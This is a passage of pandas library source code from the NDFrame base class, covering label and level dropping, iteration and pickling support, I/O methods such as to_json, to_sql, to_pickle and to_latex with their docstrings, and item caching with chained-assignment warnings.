Otherwise if key matches a column level then drop the level.
Parameters
----------
keys: str or list of str
labels or levels to drop
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
dropped: DataFrame
Raises
------
ValueError
if any `keys` match neither a label nor a level
"""
axis = self._get_axis_number(axis)
if self.ndim > 2:
raise NotImplementedError(
"_drop_labels_or_levels is not implemented for {type}"
.format(type=type(self)))
# Validate keys
keys = com._maybe_make_list(keys)
invalid_keys = [k for k in keys if not
self._is_label_or_level_reference(k, axis=axis)]
if invalid_keys:
raise ValueError(("The following keys are not valid labels or "
"levels for axis {axis}: {invalid_keys}")
.format(axis=axis,
invalid_keys=invalid_keys))
# Compute levels and labels to drop
levels_to_drop = [k for k in keys
if self._is_level_reference(k, axis=axis)]
labels_to_drop = [k for k in keys
if not self._is_level_reference(k, axis=axis)]
# Perform copy upfront and then use inplace operations below.
# This ensures that we always perform exactly one copy.
# ``copy`` and/or ``inplace`` options could be added in the future.
dropped = self.copy()
if axis == 0:
# Handle dropping index levels
if levels_to_drop:
dropped.reset_index(levels_to_drop, drop=True, inplace=True)
# Handle dropping columns labels
if labels_to_drop:
dropped.drop(labels_to_drop, axis=1, inplace=True)
else:
# Handle dropping column levels
if levels_to_drop:
if isinstance(dropped.columns, MultiIndex):
# Drop the specified levels from the MultiIndex
dropped.columns = dropped.columns.droplevel(levels_to_drop)
else:
# Drop the last level of Index by replacing with
# a RangeIndex
dropped.columns = RangeIndex(dropped.columns.size)
# Handle dropping index labels
if labels_to_drop:
dropped.drop(labels_to_drop, axis=0, inplace=True)
return dropped
# ----------------------------------------------------------------------
# Iteration
def __hash__(self):
raise TypeError('{0!r} objects are mutable, thus they cannot be'
' hashed'.format(self.__class__.__name__))
def __iter__(self):
"""Iterate over infor axis"""
return iter(self._info_axis)
# can we get a better explanation of this?
def keys(self):
"""Get the 'info axis' (see Indexing for more)
This is index for Series, columns for DataFrame and major_axis for
Panel.
"""
return self._info_axis
def iteritems(self):
"""Iterate over (label, values) on info axis
This is index for Series, columns for DataFrame, major_axis for Panel,
and so on.
"""
for h in self._info_axis:
yield h, self[h]
def __len__(self):
"""Returns length of info axis"""
return len(self._info_axis)
def __contains__(self, key):
"""True if the key is in the info axis"""
return key in self._info_axis
@property
def empty(self):
"""
Indicator whether DataFrame is empty.
True if DataFrame is entirely empty (no items), meaning any of the
axes are of length 0.
Returns
-------
bool
If DataFrame is empty, return True, if not return False.
Notes
-----
If DataFrame contains only NaNs, it is still not considered empty. See
the example below.
Examples
--------
An example of an actual empty DataFrame. Notice the index is empty:
>>> df_empty = pd.DataFrame({'A' : []})
>>> df_empty
Empty DataFrame
Columns: [A]
Index: []
>>> df_empty.empty
True
If we only have NaNs in our DataFrame, it is not considered empty! We
will need to drop the NaNs to make the DataFrame empty:
>>> df = pd.DataFrame({'A' : [np.nan]})
>>> df
A
0 NaN
>>> df.empty
False
>>> df.dropna().empty
True
See also
--------
pandas.Series.dropna
pandas.DataFrame.dropna
"""
return any(len(self._get_axis(a)) == 0 for a in self._AXIS_ORDERS)
def __nonzero__(self):
raise ValueError("The truth value of a {0} is ambiguous. "
"Use a.empty, a.bool(), a.item(), a.any() or a.all()."
.format(self.__class__.__name__))
__bool__ = __nonzero__
def bool(self):
"""Return the bool of a single element PandasObject.
This must be a boolean scalar value, either True or False. Raise a
ValueError if the PandasObject does not have exactly 1 element, or that
element is not boolean
"""
v = self.squeeze()
if isinstance(v, (bool, np.bool_)):
return bool(v)
elif is_scalar(v):
raise ValueError("bool cannot act on a non-boolean single element "
"{0}".format(self.__class__.__name__))
self.__nonzero__()
def __abs__(self):
return self.abs()
def __round__(self, decimals=0):
return self.round(decimals)
# ----------------------------------------------------------------------
# Array Interface
def __array__(self, dtype=None):
return com._values_from_object(self)
def __array_wrap__(self, result, context=None):
d = self._construct_axes_dict(self._AXIS_ORDERS, copy=False)
return self._constructor(result, **d).__finalize__(self)
# ideally we would define this to avoid the getattr checks, but
# is slower
# @property
# def __array_interface__(self):
# """ provide numpy array interface method """
# values = self.values
# return dict(typestr=values.dtype.str,shape=values.shape,data=values)
def to_dense(self):
"""Return dense representation of NDFrame (as opposed to sparse)"""
# compat
return self
# ----------------------------------------------------------------------
# Picklability
def __getstate__(self):
meta = {k: getattr(self, k, None) for k in self._metadata}
return dict(_data=self._data, _typ=self._typ, _metadata=self._metadata,
**meta)
def __setstate__(self, state):
if isinstance(state, BlockManager):
self._data = state
elif isinstance(state, dict):
typ = state.get('_typ')
if typ is not None:
# set in the order of internal names
# to avoid definitional recursion
# e.g. say fill_value needing _data to be
# defined
meta = set(self._internal_names + self._metadata)
for k in list(meta):
if k in state:
v = state[k]
object.__setattr__(self, k, v)
for k, v in state.items():
if k not in meta:
object.__setattr__(self, k, v)
else:
self._unpickle_series_compat(state)
elif isinstance(state[0], dict):
if len(state) == 5:
self._unpickle_sparse_frame_compat(state)
else:
self._unpickle_frame_compat(state)
elif len(state) == 4:
self._unpickle_panel_compat(state)
elif len(state) == 2:
self._unpickle_series_compat(state)
else: # pragma: no cover
# old pickling format, for compatibility
self._unpickle_matrix_compat(state)
self._item_cache = {}
# ----------------------------------------------------------------------
# IO
def _repr_latex_(self):
"""
Returns a LaTeX representation for a particular object.
Mainly for use with nbconvert (jupyter notebook conversion to pdf).
"""
if config.get_option('display.latex.repr'):
return self.to_latex()
else:
return None
# ----------------------------------------------------------------------
# I/O Methods
_shared_docs['to_excel'] = """
Write %(klass)s to an excel sheet
%(versionadded_to_excel)s
Parameters
----------
excel_writer : string or ExcelWriter object
File path or existing ExcelWriter
sheet_name : string, default 'Sheet1'
Name of sheet which will contain DataFrame
na_rep : string, default ''
Missing data representation
float_format : string, default None
Format string for floating point numbers
columns : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out the column names. If a list of strings is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow :
upper left cell row to dump data frame
startcol :
upper left cell column to dump data frame
engine : string, default None
write engine to use - you can also set this via the options
``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
merge_cells : boolean, default True
Write MultiIndex and Hierarchical Rows as merged cells.
encoding: string, default None
encoding of the resulting excel file. Only necessary for xlwt,
other writers support unicode natively.
inf_rep : string, default 'inf'
Representation for infinity (there is no native representation for
infinity in Excel)
freeze_panes : tuple of integer (length 2), default None
Specifies the one-based bottommost row and rightmost column that
is to be frozen
.. versionadded:: 0.20.0
Notes
-----
If passing an existing ExcelWriter object, then the sheet will be added
to the existing workbook. This can be used to save different
DataFrames to one workbook:
>>> writer = pd.ExcelWriter('output.xlsx')
>>> df1.to_excel(writer,'Sheet1')
>>> df2.to_excel(writer,'Sheet2')
>>> writer.save()
For compatibility with to_csv, to_excel serializes lists and dicts to
strings before writing.
"""
def to_json(self, path_or_buf=None, orient=None, date_format=None,
double_precision=10, force_ascii=True, date_unit='ms',
default_handler=None, lines=False, compression=None,
index=True):
"""
Convert the object to a JSON string.
Note NaN's and None will be converted to null and datetime objects
will be converted to UNIX timestamps.
Parameters
----------
path_or_buf : string or file handle, optional
File path or object. If not specified, the result is returned as
a string.
orient : string
Indication of expected JSON string format.
* Series
- default is 'index'
- allowed values are: {'split','records','index'}
* DataFrame
- default is 'columns'
- allowed values are:
{'split','records','index','columns','values'}
* The format of the JSON string
- 'split' : dict like {'index' -> [index],
'columns' -> [columns], 'data' -> [values]}
- 'records' : list like
[{column -> value}, ... , {column -> value}]
- 'index' : dict like {index -> {column -> value}}
- 'columns' : dict like {column -> {index -> value}}
- 'values' : just the values array
- 'table' : dict like {'schema': {schema}, 'data': {data}}
describing the data, and the data component is
like ``orient='records'``.
.. versionchanged:: 0.20.0
date_format : {None, 'epoch', 'iso'}
Type of date conversion. 'epoch' = epoch milliseconds,
'iso' = ISO8601. The default depends on the `orient`. For
``orient='table'``, the default is 'iso'. For all other orients,
the default is 'epoch'.
double_precision : int, default 10
The number of decimal places to use when encoding
floating point values.
force_ascii : boolean, default True
Force encoded string to be ASCII.
date_unit : string, default 'ms' (milliseconds)
The time unit to encode to, governs timestamp and ISO8601
precision. One of 's', 'ms', 'us', 'ns' for second, millisecond,
microsecond, and nanosecond respectively.
default_handler : callable, default None
Handler to call if object cannot otherwise be converted to a
suitable format for JSON. Should receive a single argument which is
the object to convert and return a serialisable object.
lines : boolean, default False
If 'orient' is 'records' write out line delimited json format. Will
throw ValueError if incorrect 'orient' since others are not list
like.
.. versionadded:: 0.19.0
compression : {None, 'gzip', 'bz2', 'zip', 'xz'}
A string representing the compression to use in the output file,
only used when the first argument is a filename.
.. versionadded:: 0.21.0
index : boolean, default True
Whether to include the index values in the JSON string. Not
including the index (``index=False``) is only supported when
orient is 'split' or 'table'.
.. versionadded:: 0.23.0
See Also
--------
pandas.read_json
Examples
--------
>>> df = pd.DataFrame([['a', 'b'], ['c', 'd']],
... index=['row 1', 'row 2'],
... columns=['col 1', 'col 2'])
>>> df.to_json(orient='split')
'{"columns":["col 1","col 2"],
"index":["row 1","row 2"],
"data":[["a","b"],["c","d"]]}'
Encoding/decoding a Dataframe using ``'records'`` formatted JSON.
Note that index labels are not preserved with this encoding.
>>> df.to_json(orient='records')
'[{"col 1":"a","col 2":"b"},{"col 1":"c","col 2":"d"}]'
Encoding/decoding a Dataframe using ``'index'`` formatted JSON:
>>> df.to_json(orient='index')
'{"row 1":{"col 1":"a","col 2":"b"},"row 2":{"col 1":"c","col 2":"d"}}'
Encoding/decoding a Dataframe using ``'columns'`` formatted JSON:
>>> df.to_json(orient='columns')
'{"col 1":{"row 1":"a","row 2":"c"},"col 2":{"row 1":"b","row 2":"d"}}'
Encoding/decoding a Dataframe using ``'values'`` formatted JSON:
>>> df.to_json(orient='values')
'[["a","b"],["c","d"]]'
Encoding with Table Schema
>>> df.to_json(orient='table')
'{"schema": {"fields": [{"name": "index", "type": "string"},
{"name": "col 1", "type": "string"},
{"name": "col 2", "type": "string"}],
"primaryKey": "index",
"pandas_version": "0.20.0"},
"data": [{"index": "row 1", "col 1": "a", "col 2": "b"},
{"index": "row 2", "col 1": "c", "col 2": "d"}]}'
"""
from pandas.io import json
if date_format is None and orient == 'table':
date_format = 'iso'
elif date_format is None:
date_format = 'epoch'
return json.to_json(path_or_buf=path_or_buf, obj=self, orient=orient,
date_format=date_format,
double_precision=double_precision,
force_ascii=force_ascii, date_unit=date_unit,
default_handler=default_handler,
lines=lines, compression=compression,
index=index)
def to_hdf(self, path_or_buf, key, **kwargs):
"""
Write the contained data to an HDF5 file using HDFStore.
Hierarchical Data Format (HDF) is self-describing, allowing an
application to interpret the structure and contents of a file with
no outside information. One HDF file can hold a mix of related objects
which can be accessed as a group or as individual objects.
In order to add another DataFrame or Series to an existing HDF file
please use append mode and a different a key.
For more information see the :ref:`user guide <io.html#io-hdf5>`.
Parameters
----------
path_or_buf : str or pandas.HDFStore
File path or HDFStore object.
key : str
Identifier for the group in the store.
mode : {'a', 'w', 'r+'}, default 'a'
Mode to open file:
- 'w': write, a new file is created (an existing file with
the same name would be deleted).
- 'a': append, an existing file is opened for reading and
writing, and if the file does not exist it is created.
- 'r+': similar to 'a', but the file must already exist.
format : {'fixed', 'table'}, default 'fixed'
Possible values:
- 'fixed': Fixed format. Fast writing/reading. Not-appendable,
nor searchable.
- 'table': Table format. Write as a PyTables Table structure
which may perform worse but allow more flexible operations
like searching / selecting subsets of the data.
append : bool, default False
For Table formats, append the input data to the existing.
data_columns : list of columns or True, optional
List of columns to create as indexed data columns for on-disk
queries, or True to use all columns. By default only the axes
of the object are indexed. See `here
<http://pandas.pydata.org/pandas-docs/stable/io.html#query-via-data-columns>`__.
Applicable only to format='table'.
complevel : {0-9}, optional
Specifies a compression level for data.
A value of 0 disables compression.
complib : {'zlib', 'lzo', 'bzip2', 'blosc'}, default 'zlib'
Specifies the compression library to be used.
As of v0.20.2 these additional compressors for Blosc are supported
(default if no compressor specified: 'blosc:blosclz'):
{'blosc:blosclz', 'blosc:lz4', 'blosc:lz4hc', 'blosc:snappy',
'blosc:zlib', 'blosc:zstd'}.
Specifying a compression library which is not available issues
a ValueError.
fletcher32 : bool, default False
If applying compression use the fletcher32 checksum.
dropna : bool, default False
If true, ALL nan rows will not be written to store.
See Also
--------
DataFrame.read_hdf : Read from HDF file.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_feather : Write out feather-format for DataFrames.
DataFrame.to_csv : Write out to a csv file.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]},
... index=['a', 'b', 'c'])
>>> df.to_hdf('data.h5', key='df', mode='w')
We can add another object to the same file:
>>> s = pd.Series([1, 2, 3, 4])
>>> s.to_hdf('data.h5', key='s')
Reading from HDF file:
>>> pd.read_hdf('data.h5', 'df')
A B
a 1 4
b 2 5
c 3 6
>>> pd.read_hdf('data.h5', 's')
0 1
1 2
2 3
3 4
dtype: int64
Deleting file with data:
>>> import os
>>> os.remove('data.h5')
"""
from pandas.io import pytables
return pytables.to_hdf(path_or_buf, key, self, **kwargs)
def to_msgpack(self, path_or_buf=None, encoding='utf-8', **kwargs):
"""
msgpack (serialize) object to input file path
THIS IS AN EXPERIMENTAL LIBRARY and the storage format
may not be stable until a future release.
Parameters
----------
path : string File path, buffer-like, or None
if None, return generated string
append : boolean whether to append to an existing msgpack
(default is False)
compress : type of compressor (zlib or blosc), default to None (no
compression)
"""
from pandas.io import packers
return packers.to_msgpack(path_or_buf, self, encoding=encoding,
**kwargs)
def to_sql(self, name, con, schema=None, if_exists='fail', index=True,
index_label=None, chunksize=None, dtype=None):
"""
Write records stored in a DataFrame to a SQL database.
Databases supported by SQLAlchemy [1]_ are supported. Tables can be
newly created, appended to, or overwritten.
Parameters
----------
name : string
Name of SQL table.
con : sqlalchemy.engine.Engine or sqlite3.Connection
Using SQLAlchemy makes it possible to use any DB supported by that
library. Legacy support is provided for sqlite3.Connection objects.
schema : string, optional
Specify the schema (if database flavor supports this). If None, use
default schema.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
How to behave if the table already exists.
* fail: Raise a ValueError.
* replace: Drop the table before inserting new values.
* append: Insert new values to the existing table.
index : boolean, default True
Write DataFrame index as a column. Uses `index_label` as the column
name in the table.
index_label : string or sequence, default None
Column label for index column(s). If None is given (default) and
`index` is True, then the index names are used.
A sequence should be given if the DataFrame uses MultiIndex.
chunksize : int, optional
Rows will be written in batches of this size at a time. By default,
all rows will be written at once.
dtype : dict, optional
Specifying the datatype for columns. The keys should be the column
names and the values should be the SQLAlchemy types or strings for
the sqlite3 legacy mode.
Raises
------
ValueError
When the table already exists and `if_exists` is 'fail' (the
default).
See Also
--------
pandas.read_sql : read a DataFrame from a table
References
----------
.. [1] http://docs.sqlalchemy.org
.. [2] https://www.python.org/dev/peps/pep-0249/
Examples
--------
Create an in-memory SQLite database.
>>> from sqlalchemy import create_engine
>>> engine = create_engine('sqlite://', echo=False)
Create a table from scratch with 3 rows.
>>> df = pd.DataFrame({'name' : ['User 1', 'User 2', 'User 3']})
>>> df
name
0 User 1
1 User 2
2 User 3
>>> df.to_sql('users', con=engine)
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 1'), (1, 'User 2'), (2, 'User 3')]
>>> df1 = pd.DataFrame({'name' : ['User 4', 'User 5']})
>>> df1.to_sql('users', con=engine, if_exists='append')
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 1'), (1, 'User 2'), (2, 'User 3'),
(0, 'User 4'), (1, 'User 5')]
Overwrite the table with just ``df1``.
>>> df1.to_sql('users', con=engine, if_exists='replace',
... index_label='id')
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 4'), (1, 'User 5')]
Specify the dtype (especially useful for integers with missing values).
Notice that while pandas is forced to store the data as floating point,
the database supports nullable integers. When fetching the data with
Python, we get back integer scalars.
>>> df = pd.DataFrame({"A": [1, None, 2]})
>>> df
A
0 1.0
1 NaN
2 2.0
>>> from sqlalchemy.types import Integer
>>> df.to_sql('integers', con=engine, index=False,
... dtype={"A": Integer()})
>>> engine.execute("SELECT * FROM integers").fetchall()
[(1,), (None,), (2,)]
"""
from pandas.io import sql
sql.to_sql(self, name, con, schema=schema, if_exists=if_exists,
index=index, index_label=index_label, chunksize=chunksize,
dtype=dtype)
def to_pickle(self, path, compression='infer',
protocol=pkl.HIGHEST_PROTOCOL):
"""
Pickle (serialize) object to file.
Parameters
----------
path : str
File path where the pickled object will be stored.
compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}, \
default 'infer'
A string representing the compression to use in the output file. By
default, infers from the file extension in specified path.
.. versionadded:: 0.20.0
protocol : int
Int which indicates which protocol should be used by the pickler,
default HIGHEST_PROTOCOL (see [1], paragraph 12.1.2). The possible
values for this parameter depend on the version of Python. For
Python 2.x, possible values are 0, 1, 2. For Python>=3.0, 3 is a
valid value. For Python >= 3.4, 4 is a valid value. A negative
value for the protocol parameter is equivalent to setting its value
to HIGHEST_PROTOCOL.
.. [1] https://docs.python.org/3/library/pickle.html
.. versionadded:: 0.21.0
See Also
--------
read_pickle : Load pickled pandas object (or any object) from file.
DataFrame.to_hdf : Write DataFrame to an HDF5 file.
DataFrame.to_sql : Write DataFrame to a SQL database.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
Examples
--------
>>> original_df = pd.DataFrame({"foo": range(5), "bar": range(5, 10)})
>>> original_df
foo bar
0 0 5
1 1 6
2 2 7
3 3 8
4 4 9
>>> original_df.to_pickle("./dummy.pkl")
>>> unpickled_df = pd.read_pickle("./dummy.pkl")
>>> unpickled_df
foo bar
0 0 5
1 1 6
2 2 7
3 3 8
4 4 9
>>> import os
>>> os.remove("./dummy.pkl")
"""
from pandas.io.pickle import to_pickle
return to_pickle(self, path, compression=compression,
protocol=protocol)
def to_clipboard(self, excel=True, sep=None, **kwargs):
r"""
Copy object to the system clipboard.
Write a text representation of object to the system clipboard.
This can be pasted into Excel, for example.
Parameters
----------
excel : bool, default True
- True, use the provided separator, writing in a csv format for
allowing easy pasting into excel.
- False, write a string representation of the object to the
clipboard.
sep : str, default ``'\t'``
Field delimiter.
**kwargs
These parameters will be passed to DataFrame.to_csv.
See Also
--------
DataFrame.to_csv : Write a DataFrame to a comma-separated values
(csv) file.
read_clipboard : Read text from clipboard and pass to read_table.
Notes
-----
Requirements for your platform.
- Linux : `xclip`, or `xsel` (with `gtk` or `PyQt4` modules)
- Windows : none
- OS X : none
Examples
--------
Copy the contents of a DataFrame to the clipboard.
>>> df = pd.DataFrame([[1, 2, 3], [4, 5, 6]], columns=['A', 'B', 'C'])
>>> df.to_clipboard(sep=',')
... # Wrote the following to the system clipboard:
... # ,A,B,C
... # 0,1,2,3
... # 1,4,5,6
We can omit the the index by passing the keyword `index` and setting
it to false.
>>> df.to_clipboard(sep=',', index=False)
... # Wrote the following to the system clipboard:
... # A,B,C
... # 1,2,3
... # 4,5,6
"""
from pandas.io import clipboards
clipboards.to_clipboard(self, excel=excel, sep=sep, **kwargs)
def to_xarray(self):
"""
Return an xarray object from the pandas object.
Returns
-------
a DataArray for a Series
a Dataset for a DataFrame
a DataArray for higher dims
Examples
--------
>>> df = pd.DataFrame({'A' : [1, 1, 2],
'B' : ['foo', 'bar', 'foo'],
'C' : np.arange(4.,7)})
>>> df
A B C
0 1 foo 4.0
1 1 bar 5.0
2 2 foo 6.0
>>> df.to_xarray()
<xarray.Dataset>
Dimensions: (index: 3)
Coordinates:
* index (index) int64 0 1 2
Data variables:
A (index) int64 1 1 2
B (index) object 'foo' 'bar' 'foo'
C (index) float64 4.0 5.0 6.0
>>> df = pd.DataFrame({'A' : [1, 1, 2],
'B' : ['foo', 'bar', 'foo'],
'C' : np.arange(4.,7)}
).set_index(['B','A'])
>>> df
C
B A
foo 1 4.0
bar 1 5.0
foo 2 6.0
>>> df.to_xarray()
<xarray.Dataset>
Dimensions: (A: 2, B: 2)
Coordinates:
* B (B) object 'bar' 'foo'
* A (A) int64 1 2
Data variables:
C (B, A) float64 5.0 nan 4.0 6.0
>>> p = pd.Panel(np.arange(24).reshape(4,3,2),
items=list('ABCD'),
major_axis=pd.date_range('20130101', periods=3),
minor_axis=['first', 'second'])
>>> p
<class 'pandas.core.panel.Panel'>
Dimensions: 4 (items) x 3 (major_axis) x 2 (minor_axis)
Items axis: A to D
Major_axis axis: 2013-01-01 00:00:00 to 2013-01-03 00:00:00
Minor_axis axis: first to second
>>> p.to_xarray()
<xarray.DataArray (items: 4, major_axis: 3, minor_axis: 2)>
array([[[ 0, 1],
[ 2, 3],
[ 4, 5]],
[[ 6, 7],
[ 8, 9],
[10, 11]],
[[12, 13],
[14, 15],
[16, 17]],
[[18, 19],
[20, 21],
[22, 23]]])
Coordinates:
* items (items) object 'A' 'B' 'C' 'D'
* major_axis (major_axis) datetime64[ns] 2013-01-01 2013-01-02 2013-01-03 # noqa
* minor_axis (minor_axis) object 'first' 'second'
Notes
-----
See the `xarray docs <http://xarray.pydata.org/en/stable/>`__
"""
try:
import xarray
except ImportError:
# Give a nice error message
raise ImportError("the xarray library is not installed\n"
"you can install via conda\n"
"conda install xarray\n"
"or via pip\n"
"pip install xarray\n")
if self.ndim == 1:
return xarray.DataArray.from_series(self)
elif self.ndim == 2:
return xarray.Dataset.from_dataframe(self)
# > 2 dims
coords = [(a, self._get_axis(a)) for a in self._AXIS_ORDERS]
return xarray.DataArray(self,
coords=coords,
)
_shared_docs['to_latex'] = r"""
Render an object to a tabular environment table. You can splice
this into a LaTeX document. Requires \\usepackage{booktabs}.
.. versionchanged:: 0.20.2
Added to Series
`to_latex`-specific options:
bold_rows : boolean, default False
Make the row labels bold in the output
column_format : str, default None
The columns format as specified in `LaTeX table format
<https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g 'rcl' for 3
columns
longtable : boolean, default will be read from the pandas config module
Default: False.
Use a longtable environment instead of tabular. Requires adding
a \\usepackage{longtable} to your LaTeX preamble.
escape : boolean, default will be read from the pandas config module
Default: True.
When set to False prevents from escaping latex special
characters in column names.
encoding : str, default None
A string representing the encoding to use in the output file,
defaults to 'ascii' on Python 2 and 'utf-8' on Python 3.
decimal : string, default '.'
Character recognized as decimal separator, e.g. ',' in Europe.
.. versionadded:: 0.18.0
multicolumn : boolean, default True
Use \multicolumn to enhance MultiIndex columns.
The default will be read from the config module.
.. versionadded:: 0.20.0
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
The default will be read from the config module.
.. versionadded:: 0.20.0
multirow : boolean, default False
Use \multirow to enhance MultiIndex rows.
Requires adding a \\usepackage{multirow} to your LaTeX preamble.
Will print centered labels (instead of top-aligned)
across the contained rows, separating groups via clines.
The default will be read from the pandas config module.
.. versionadded:: 0.20.0
"""
@Substitution(header='Write out the column names. If a list of strings '
'is given, it is assumed to be aliases for the '
'column names.')
@Appender(_shared_docs['to_latex'] % _shared_doc_kwargs)
def to_latex(self, buf=None, columns=None, col_space=None, header=True,
index=True, na_rep='NaN', formatters=None, float_format=None,
sparsify=None, index_names=True, bold_rows=False,
column_format=None, longtable=None, escape=None,
encoding=None, decimal='.', multicolumn=None,
multicolumn_format=None, multirow=None):
# Get defaults from the pandas config
if self.ndim == 1:
self = self.to_frame()
if longtable is None:
longtable = config.get_option("display.latex.longtable")
if escape is None:
escape = config.get_option("display.latex.escape")
if multicolumn is None:
multicolumn = config.get_option("display.latex.multicolumn")
if multicolumn_format is None:
multicolumn_format = config.get_option(
"display.latex.multicolumn_format")
if multirow is None:
multirow = config.get_option("display.latex.multirow")
formatter = DataFrameFormatter(self, buf=buf, columns=columns,
col_space=col_space, na_rep=na_rep,
header=header, index=index,
formatters=formatters,
float_format=float_format,
bold_rows=bold_rows,
sparsify=sparsify,
index_names=index_names,
escape=escape, decimal=decimal)
formatter.to_latex(column_format=column_format, longtable=longtable,
encoding=encoding, multicolumn=multicolumn,
multicolumn_format=multicolumn_format,
multirow=multirow)
if buf is None:
return formatter.buf.getvalue()
# ----------------------------------------------------------------------
# Fancy Indexing
@classmethod
def _create_indexer(cls, name, indexer):
"""Create an indexer like _name in the class."""
if getattr(cls, name, None) is None:
_indexer = functools.partial(indexer, name)
setattr(cls, name, property(_indexer, doc=indexer.__doc__))
def get(self, key, default=None):
"""
Get item from object for given key (DataFrame column, Panel slice,
etc.). Returns default value if not found.
Parameters
----------
key : object
Returns
-------
value : type of items contained in object
"""
try:
return self[key]
except (KeyError, ValueError, IndexError):
return default
def __getitem__(self, item):
return self._get_item_cache(item)
def _get_item_cache(self, item):
"""Return the cached item, item represents a label indexer."""
cache = self._item_cache
res = cache.get(item)
if res is None:
values = self._data.get(item)
res = self._box_item_values(item, values)
cache[item] = res
res._set_as_cached(item, self)
# for a chain
res._is_copy = self._is_copy
return res
def _set_as_cached(self, item, cacher):
"""Set the _cacher attribute on the calling object with a weakref to
cacher.
"""
self._cacher = (item, weakref.ref(cacher))
def _reset_cacher(self):
"""Reset the cacher."""
if hasattr(self, '_cacher'):
del self._cacher
def _iget_item_cache(self, item):
"""Return the cached item, item represents a positional indexer."""
ax = self._info_axis
if ax.is_unique:
lower = self._get_item_cache(ax[item])
else:
lower = self._take(item, axis=self._info_axis_number,
convert=True)
return lower
def _box_item_values(self, key, values):
raise com.AbstractMethodError(self)
def _maybe_cache_changed(self, item, value):
"""The object has called back to us saying maybe it has changed.
"""
self._data.set(item, value, check=False)
@property
def _is_cached(self):
"""Return boolean indicating if self is cached or not."""
return getattr(self, '_cacher', None) is not None
def _get_cacher(self):
"""return my cacher or None"""
cacher = getattr(self, '_cacher', None)
if cacher is not None:
cacher = cacher[1]()
return cacher
@property
def _is_view(self):
"""Return boolean indicating if self is view of another array """
return self._data.is_view
def _maybe_update_cacher(self, clear=False, verify_is_copy=True):
"""
See if we need to update our parent cacher if clear, then clear our
cache.
Parameters
----------
clear : boolean, default False
clear the item cache
verify_is_copy : boolean, default True
provide is_copy checks
"""
cacher = getattr(self, '_cacher', None)
if cacher is not None:
ref = cacher[1]()
# we are trying to reference a dead referant, hence
# a copy
if ref is None:
del self._cacher
else:
try:
ref._maybe_cache_changed(cacher[0], self)
except Exception:
pass
if verify_is_copy:
self._check_setitem_copy(stacklevel=5, t='referant')
if clear:
self._clear_item_cache()
def _clear_item_cache(self, i=None):
if i is not None:
self._item_cache.pop(i, None)
else:
self._item_cache.clear()
def _slice(self, slobj, axis=0, kind=None):
"""
Construct a slice of this container.
kind parameter is maintained for compatibility with Series slicing.
"""
axis = self._get_block_manager_axis(axis)
result = self._constructor(self._data.get_slice(slobj, axis=axis))
result = result.__finalize__(self)
# this could be a view
# but only in a single-dtyped view slicable case
is_copy = axis != 0 or result._is_view
result._set_is_copy(self, copy=is_copy)
return result
def _set_item(self, key, value):
self._data.set(key, value)
self._clear_item_cache()
def _set_is_copy(self, ref=None, copy=True):
if not copy:
self._is_copy = None
else:
if ref is not None:
self._is_copy = weakref.ref(ref)
else:
self._is_copy = None
def _check_is_chained_assignment_possible(self):
"""
Check if we are a view, have a cacher, and are of mixed type.
If so, then force a setitem_copy check.
Should be called just near setting a value
Will return a boolean if it we are a view and are cached, but a
single-dtype meaning that the cacher should be updated following
setting.
"""
if self._is_view and self._is_cached:
ref = self._get_cacher()
if ref is not None and ref._is_mixed_type:
self._check_setitem_copy(stacklevel=4, t='referant',
force=True)
return True
elif self._is_copy:
self._check_setitem_copy(stacklevel=4, t='referant')
return False
def _check_setitem_copy(self, stacklevel=4, t='setting', force=False):
"""
Parameters
----------
stacklevel : integer, default 4
the level to show of the stack when the error is output
t : string, the type of setting error
force : boolean, default False
if True, then force showing an error
validate if we are doing a settitem on a chained copy.
If you call this function, be sure to set the stacklevel such that the
user will see the error *at the level of setting*
It is technically possible to figure out that we are setting on
a copy even WITH a multi-dtyped pandas object. In other words, some
blocks may be views while other are not. Currently _is_view will ALWAYS
return False for multi-blocks to avoid having to handle this case.
df = DataFrame(np.arange(0,9), columns=['count'])
df['group'] = 'b'
# This technically need not raise SettingWithCopy if both are view
# (which is not # generally guaranteed but is usually True. However,
# this is in general not a good practice and we recommend using .loc.
df.iloc[0:5]['group'] = 'a'
"""
if force or self._is_copy:
value = config.get_option('mode.chained_assignment')
if value is None:
return
# see if the copy is not actually referred; if so, then dissolve
# the copy weakref
try:
gc.collect(2)
if not gc.get_referents(self._is_copy()):
self._is_copy = None
return
except Exception:
pass
# we might be a false positive
try:
if self._is_copy().shape == self.shape:
self._is_copy = None
return
except Exception:
pass
# a custom message
if isinstance(self._is_copy, string_types):
t = self._is_copy
elif t == 'referant':
t = ("\n"
"A value is trying to be set on a copy of a slice from a "
"DataFrame\n\n"
"See the caveats in the documentation: "
"http://pandas.pydata.org/pandas-docs/stable/"
"indexing.html#indexing-view-versus-copy"
)
else:
t = ("\n"
"A value is trying to be set on a copy of a slice from a "
"DataFrame.\n"
"Try using .loc[row_indexer,col_indexer] = value "
"instead\n\nSee the caveats in the documentation: "
"http://pandas.pydata.org/pandas-docs/stable/"
"indexing.html#indexing-view-versus-copy"
)
if value == 'raise':
raise com.SettingWithCopyError(t)
elif value == 'warn':
warnings.warn(t, com.SettingWithCopyWarning,
stacklevel=stacklevel)
def __delitem__(self, key):
"""
Delete item
"""
deleted = False
maybe_shortcut = False
if hasattr(self, 'columns') and isinstance(self.columns, MultiIndex):
try:
maybe_shortcut = key not in self.columns._engine
except TypeError:
pass
if maybe_shortcut:
# Allow shorthand to delete all columns whose first len(key)
# elements match key:
if not isinstance(key, tuple):
key = (key, )
for col in self.columns:
